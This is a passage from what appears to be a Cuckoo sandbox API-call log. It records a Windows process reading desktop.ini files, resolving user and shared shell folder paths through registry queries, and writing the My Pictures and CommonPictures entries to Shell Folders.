FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\Application Data |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\Application Data\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21765
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS\system32 |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000000 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
FAILURE | 0x00000002 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Policies\Explorer |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 DataLength => 4 ValueName => CompareJunctionness Type => 1303220 |
FAILURE | 0x00000002 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS\system32 |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\WINDOWS |
SUCCESS | 0x001af608 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00U\x00S\x00E\x00R\x00P\x00R\x00O\x00F\x00I\x00L\x00E\x00%\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00 ValueName => My Pictures |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000001 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00c\x00u\x00c\x00k\x00o\x00o\x00\\x00M\x00y\x00 \x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00 ValueName => My Pictures Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\My Documents |
SUCCESS | 0x00193e98 | |
| 19:40:26,463 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,463 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => P\x00\x00\x00\x00\x00\x00\x00M\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=5
PersonalizedName=My Documents
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\cuckoo\My Documents\My Pictures\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => \xb8\x00\x00\x00\x00\x00\x00\x00\xb8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [DeleteOnCopy]
Owner=cuckoo
Personalized=39
PersonalizedName=My Pictures
[.ShellClassInfo]
InfoTip=@Shell32.dll,-12688
IconFile=%SystemRoot%\system32\mydocs.dll
IconIndex=-101
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 DataLength => 520 ValueName => ProgramFilesDir (x86) Type => 1304484 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000002 SubKey => Software\Microsoft\Windows\CurrentVersion |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => C\x00:\x00\\x00P\x00r\x00o\x00g\x00r\x00a\x00m\x00 \x00F\x00i\x00l\x00e\x00s\x00\x00\x00 ValueName => ProgramFilesDir |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x00000218 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Program Files |
SUCCESS | 0x001af608 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 DataLength => 520 ValueName => CommonPictures Type => 1303824 |
FAILURE | 0x00000002 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrLoadDll |
Flags => 1303580 BaseAddress => 0x769c0000 FileName => USERENV.dll |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => GetAllUsersProfileDirectoryW FunctionAddress => 0x769c66a1 ModuleHandle => 0x769c0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => %\x00S\x00y\x00s\x00t\x00e\x00m\x00D\x00r\x00i\x00v\x00e\x00%\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\x00\x00 ValueName => ProfilesDirectory |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000002 SubKey => Software\Microsoft\Windows NT\CurrentVersion\ProfileList |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000214 Data => A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\x00\x00 ValueName => AllUsersProfile |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | LdrGetDllHandle |
ModuleHandle => 0x7c9c0000 FileName => SHELL32 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCreateKeyExW |
Handle => 0x00000214 Access => 33554432 Registry => 0x80000002 Class => SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegSetValueExW |
Handle => 0x00000214 Buffer => C\x00:\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00 \x00a\x00n\x00d\x00 \x00S\x00e\x00t\x00t\x00i\x00n\x00g\x00s\x00\\x00A\x00l\x00l\x00 \x00U\x00s\x00e\x00r\x00s\x00\\x00D\x00o\x00c\x00u\x00m\x00e\x00n\x00t\x00s\x00\\x00M\x00y\x00 \x00P\x00i\x00c\x00t\x00u\x00r\x00e\x00s\x00\x00\x00 ValueName => CommonPictures Type => 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000214 Registry => 0x80000001 SubKey => Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegOpenKeyExW |
Handle => 0x00000218 Registry => 0x00000214 SubKey => {b602d502-5818-11e5-9f17-806d6172696f}\ |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000214 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegQueryValueExW |
Handle => 0x00000218 Data => 1 ValueName => Generation |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | RegCloseKey |
Handle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | FindFirstFileExW |
FileName => C:\Documents and Settings\All Users\Documents |
SUCCESS | 0x00193e98 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtReadFile |
Buffer => [.ShellClassInfo]
LocalizedResourceName=@shell32.dll,-21785
FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtFreeVirtualMemory |
FreeType => 0x00008000 ProcessHandle => 0xffffffff RegionSize => 0x00101000 BaseAddress => 0x01730000 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtOpenFile |
ShareAccess => 7 FileName => C:\Documents and Settings\All Users\Documents\desktop.ini DesiredAccess => 0x80100000 FileHandle => 0x00000218 |
SUCCESS | 0x00000000 | |
| 19:40:26,473 | 252 | NtQueryInformationFile |
FileHandle => 0x00000218 FileInformation => @\x00\x00\x00\x00\x00\x00\x00>\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
